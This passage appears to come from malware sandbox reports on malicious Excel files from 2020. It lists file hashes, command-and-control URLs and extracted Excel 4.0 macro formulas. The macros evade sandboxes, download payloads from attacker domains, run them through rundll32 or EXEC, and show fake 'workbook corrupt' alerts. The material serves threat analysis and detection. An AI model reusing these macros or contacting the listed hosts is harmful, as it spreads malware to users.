09b6ccc148cf7d9b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AZUGq26uHL\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"17fc91156c55042cf98ccee2538d22bc9ef1b516152e7749894cffcbdef0dc89"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"17fc91156c55042cf98ccee2538d22bc9ef1b516152e7749894cffcbdef0dc89","filesize":185344,"md5":"363f55ad3f0cc712133520077b6ab143","sha1":"57a610e082022ab624dfa79858425ac9cfaa0345","sha256":"17fc91156c55042cf98ccee2538d22bc9ef1b516152e7749894cffcbdef0dc89","sha512":"9921d5690a5c527da37aad19a4a8dbd257229e4929f859d75fe78ea4b222d1d1c66a7bae1096ab43f7d276f8bb3bcbb83ee480ec9db71ac74f8ac68e0eb3b8fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"17fc91156c55042cf98ccee2538d22bc9ef1b516152e7749894cffcbdef0dc89.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1819ff31644a7acbe9762dd386575691306e95601500451cd59fc8a890b9cb2d"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"1819ff31644a7acbe9762dd386575691306e95601500451cd59fc8a890b9cb2d","filesize":209920,"md5":"13958fe5a4f7707522096907b4ca47f5","sha1":"13a85851e2b7bed94212f0dffacf63a6b52f977b","sha256":"1819ff31644a7acbe9762dd386575691306e95601500451cd59fc8a890b9cb2d","sha512":"9edd3cb4090edfaf069d65f52ccbe136bc2b84fa95864ba0f7c34a3393be55422de23d101496a459430cac69e47cf01abc435fb8e04ef4985e13def87b5e2605","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1819ff31644a7acbe9762dd386575691306e95601500451cd59fc8a890b9cb2d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b33FLmEavi\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18247cd7225c585be54c527e4fcf57912be3a81bc3b976f608c14920ff11d99d"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"18247cd7225c585be54c527e4fcf57912be3a81bc3b976f608c14920ff11d99d","filesize":104448,"md5":"b195d8c5bcd4a4c35a2ea21f6a96301a","sha1":"c4dc99f384b2e420c33966fe96e77cc27b3f44e0","sha256":"18247cd7225c585be54c527e4fcf57912be3a81bc3b976f608c14920ff11d99d","sha512":"7cfc9832a5117f9399398015f18399aa2f5c393d2994432ab04db7976f0152effb20d91d2f6fbc9dbf3ba683c6a5dfb63606c2b20e1ea1860517163e5b5dcee0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18247cd7225c585be54c527e4fcf57912be3a81bc3b976f608c14920ff11d99d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Gsta9EAD9L\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1826e116235f4342e92dd2cadf4d94266098269209863a57fabbb7cceb45e4a9"},"analysis":{"reported":"2020-04-09T16:15:04Z","score":10},"files":[{"filename":"1826e116235f4342e92dd2cadf4d94266098269209863a57fabbb7cceb45e4a9","filesize":204800,"md5":"aa91b8b0a72f2c9ad3195d2ddf754dae","sha1":"13225f0dfb34710c0d470fe5c2687da62d83e94a","sha256":"1826e116235f4342e92dd2cadf4d94266098269209863a57fabbb7cceb45e4a9","sha512":"7e774d86a001ba7b7c761afaa36eaabc6c4d380c6c5209f33b08aa0eed0e085880b8dd55260085c249ce4bf5ab17b64a8e6a5036cbd2b9a469a5c973bdd0b475","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1826e116235f4342e92dd2cadf4d94266098269209863a57fabbb7cceb45e4a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18428a0f698dac4f189cea612b00bd7bf5d2802c3d8e38b637b2374af3daee41"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"18428a0f698dac4f189cea612b00bd7bf5d2802c3d8e38b637b2374af3daee41","filesize":141824,"md5":"09dbfc1d74a7ce602ef0f05b1c027ef6","sha1":"a7bdd8e2d20639ea5aaa6b2f5b529ab1a98ba4d3","sha256":"18428a0f698dac4f189cea612b00bd7bf5d2802c3d8e38b637b2374af3daee41","sha512":"6ed9a37a20c68b2d8086ae4e6d8d5ffdaaddf0abb5e8a27b413d66047f9cf6843ba5d8ed2aa45c1a1bbd8a97635c10b2ee6a3e17e524dd393eed39e42c080c8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18428a0f698dac4f189cea612b00bd7bf5d2802c3d8e38b637b2374af3daee41.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"99ZahDeffx\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1848f898e3677ff8579a5bb51a9fcf7afb9397a1cb35096e9c8eac31a2b4099d"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"1848f898e3677ff8579a5bb51a9fcf7afb9397a1cb35096e9c8eac31a2b4099d","filesize":185344,"md5":"c423322b2f13848442359ee0bcc6260a","sha1":"5b99ee058e9630f11c7ef2b1a83648cf16f1a401","sha256":"1848f898e3677ff8579a5bb51a9fcf7afb9397a1cb35096e9c8eac31a2b4099d","sha512":"432656e86065d86c0a48e4374ab7c63a92f700d355e8bf2e84b55c244b98644073c4ef7973776710e184d24bb02db3a3d6287fe1337049429dc780f6f810a0c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1848f898e3677ff8579a5bb51a9fcf7afb9397a1cb35096e9c8eac31a2b4099d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1852f1f35a61841ee282a760e404219c9ed05f26ddf8048ee2d3b02c76c2dab6"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"1852f1f35a61841ee282a760e404219c9ed05f26ddf8048ee2d3b02c76c2dab6","filesize":185344,"md5":"a882d4083702964868db1a3840d6265c","sha1":"cbea0e6994378e5102e640d068d638da8b56caed","sha256":"1852f1f35a61841ee282a760e404219c9ed05f26ddf8048ee2d3b02c76c2dab6","sha512":"2fe50902356158cb8b538d7431cebc2934dc51099c80fac28b5b198dd170530ad880466c0e8bf3940dce0920b67a2c54865d0938ea8020d4ac1aed9b6297c171","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1852f1f35a61841ee282a760e404219c9ed05f26ddf8048ee2d3b02c76c2dab6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"185ce56a9950d7cb530e519bed076463ce44f87eeb3e63313d0a369aa9bbeecd"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"185ce56a9950d7cb530e519bed076463ce44f87eeb3e63313d0a369aa9bbeecd","filesize":185344,"md5":"c608e2a1f0ce365e4b8299f952378792","sha1":"9524cde39a9a2c4911b7c622896edd2e2aced0c0","sha256":"185ce56a9950d7cb530e519bed076463ce44f87eeb3e63313d0a369aa9bbeecd","sha512":"11f8e2d6d19cfabac3e5a54b917ced4d4a5aefa2c99088f2b77d051a1fd247ba0fc2e8d1170e3616f877e45e50d554c280ee6dce68769b3f22768c32ea2c00e5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"185ce56a9950d7cb530e519bed076463ce44f87eeb3e63313d0a369aa9bbeecd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18620b52d250bdd0ccf0caf5245427d8788d26c32f81e73bbb12fb141a525b57"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"18620b52d250bdd0ccf0caf5245427d8788d26c32f81e73bbb12fb141a525b57","filesize":113664,"md5":"4defdbd200a5d0e2ae2a1e806fe9163a","sha1":"6fa565fa55b576204fb8ffd7b20d1c36b0c8584f","sha256":"18620b52d250bdd0ccf0caf5245427d8788d26c32f81e73bbb12fb141a525b57","sha512":"f8e3d7f71311265c9660253e86d470d09cd61420253d832fe729ae4ed6961c688da4d792dafc1e9289ca47bbd9c8bd1050153cbd0fb8bdc98682203645d67f17","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18620b52d250bdd0ccf0caf5245427d8788d26c32f81e73bbb12fb141a525b57.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"Zmd0VNc7em\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1862d020ee6745dd8f8f64dd9e60fb81d685c73084b4e261d294e5991b6a6b43"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"1862d020ee6745dd8f8f64dd9e60fb81d685c73084b4e261d294e5991b6a6b43","filesize":209408,"md5":"5f1e245a77381fc5dff0f55e63e80486","sha1":"547b132d40b4f5e94765510f3c587ef5b7f15d7b","sha256":"1862d020ee6745dd8f8f64dd9e60fb81d685c73084b4e261d294e5991b6a6b43","sha512":"386ddd16f04d562113660311427f9024a6f9b1efa504ee7d344e3e21892536b1f6b0d48d1184bd0041f8499705d086392f593868c70c3e577e5b3755615a5884","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1862d020ee6745dd8f8f64dd9e60fb81d685c73084b4e261d294e5991b6a6b43.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fMqPY56Rod\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"186e913e7df9f706ce82e96eec1debe1d1eda81a6255dfa959b8173a0ef4b5c0"},"analysis":{"reported":"2020-04-09T16:15:05Z","score":10},"files":[{"filename":"186e913e7df9f706ce82e96eec1debe1d1eda81a6255dfa959b8173a0ef4b5c0","filesize":132608,"md5":"94c0f3d95d693694b66d0d1619582003","sha1":"93577aace0e78af204c6367fce40235da8eb7d4d","sha256":"186e913e7df9f706ce82e96eec1debe1d1eda81a6255dfa959b8173a0ef4b5c0","sha512":"24f612c27d633b01894057dffc286726187eceb2cb031f211d48ae2e0bb2c898058869388bb70da0a8658d489ca395d6b9a2e053a534f3343fc44e1f39164a35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"186e913e7df9f706ce82e96eec1debe1d1eda81a6255dfa959b8173a0ef4b5c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mq5JpRT1VU\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1897c8492b7e5053d2934a5ac40e3c89bac3931d1584965f914c926d62c05a79"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"1897c8492b7e5053d2934a5ac40e3c89bac3931d1584965f914c926d62c05a79","filesize":112640,"md5":"8d1851c36e38ca36159fa742b6448c84","sha1":"1a7f8da0efc1175d201bfc7d3f223826967ed51c","sha256":"1897c8492b7e5053d2934a5ac40e3c89bac3931d1584965f914c926d62c05a79","sha512":"5fc22732a08a2a261381ad17806d51228218ad5b9d82905e7562a3708278e1121db79f89a9a7b74f10de15e62b0897e1d01bd725afb80234affd9c8e522d5cd7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1897c8492b7e5053d2934a5ac40e3c89bac3931d1584965f914c926d62c05a79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1897dc165aa70fb3f348f59ea97bd05a340809f3ce6901aa477a2e0598e1f2f9"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"1897dc165aa70fb3f348f59ea97bd05a340809f3ce6901aa477a2e0598e1f2f9","filesize":185344,"md5":"d04343bbe9b25db8539ec0986d3f788b","sha1":"7b34f9df4b15af4aac49ec53d71d76c7eb22704a","sha256":"1897dc165aa70fb3f348f59ea97bd05a340809f3ce6901aa477a2e0598e1f2f9","sha512":"6385de97d9d7958617691bd31194318f1822045efb54a6d225b9a6fcebe78654913109c656c50fbc0eaa095974a25abbd13c6e5e8bb2cfbf09bde1a9bc81bc66","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1897dc165aa70fb3f348f59ea97bd05a340809f3ce6901aa477a2e0598e1f2f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"189eb44ae790566746f8a4db059aadf43f154b7af7924ae776bdc13c1ec82f10"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"189eb44ae790566746f8a4db059aadf43f154b7af7924ae776bdc13c1ec82f10","filesize":168448,"md5":"489f20c818dd62aa3f451b4bffc85dfb","sha1":"c1b8bb1bd89214ecb44a5c5d9836d032b0cd15e2","sha256":"189eb44ae790566746f8a4db059aadf43f154b7af7924ae776bdc13c1ec82f10","sha512":"94f701717d726f37197bb8e311e2710ecebad14faf8ac273add4bfb9363ddaeb503626fb4a04d109e7b774f53dd516b4f0764c09438c9e196f3b3779f4a3fadb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"189eb44ae790566746f8a4db059aadf43f154b7af7924ae776bdc13c1ec82f10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZoJneLnAxM\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18a61d45b9db2c0951fc2eaa874f1ca16efa1293ffd078f42bbfd516d0a7e606"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"18a61d45b9db2c0951fc2eaa874f1ca16efa1293ffd078f42bbfd516d0a7e606","filesize":185344,"md5":"246d83a7c8161a9d9d56236cae76fe7e","sha1":"5c3d764c0f45bfa2d4c64f40218098aea27bb9c8","sha256":"18a61d45b9db2c0951fc2eaa874f1ca16efa1293ffd078f42bbfd516d0a7e606","sha512":"095800244312479e9ae3dc083b0fae5c1c26ec851ecead8893ab33c342944d12d8a11b435b242c2032c70d355b1d3e78d40481b92689335f63505e668012fbb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18a61d45b9db2c0951fc2eaa874f1ca16efa1293ffd078f42bbfd516d0a7e606.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18cbc2ee54eabd4320a6f244453ac64247e90e8745738f1f33bdabda4d43ecb4"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"18cbc2ee54eabd4320a6f244453ac64247e90e8745738f1f33bdabda4d43ecb4","filesize":112128,"md5":"4a1e5c9fcbeec726e4bb197c1b07ea89","sha1":"a96f3e8c7d50306e523dadad9a0e83cef867e165","sha256":"18cbc2ee54eabd4320a6f244453ac64247e90e8745738f1f33bdabda4d43ecb4","sha512":"d9bb1263494ddc5c56bde28c40c4447743212d862ef72a55cff3e0dd1614ef97e9ba185494e1a0f831b016872986b526f3bc2a7a4e2b0034c36591c9edb5a066","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18cbc2ee54eabd4320a6f244453ac64247e90e8745738f1f33bdabda4d43ecb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM 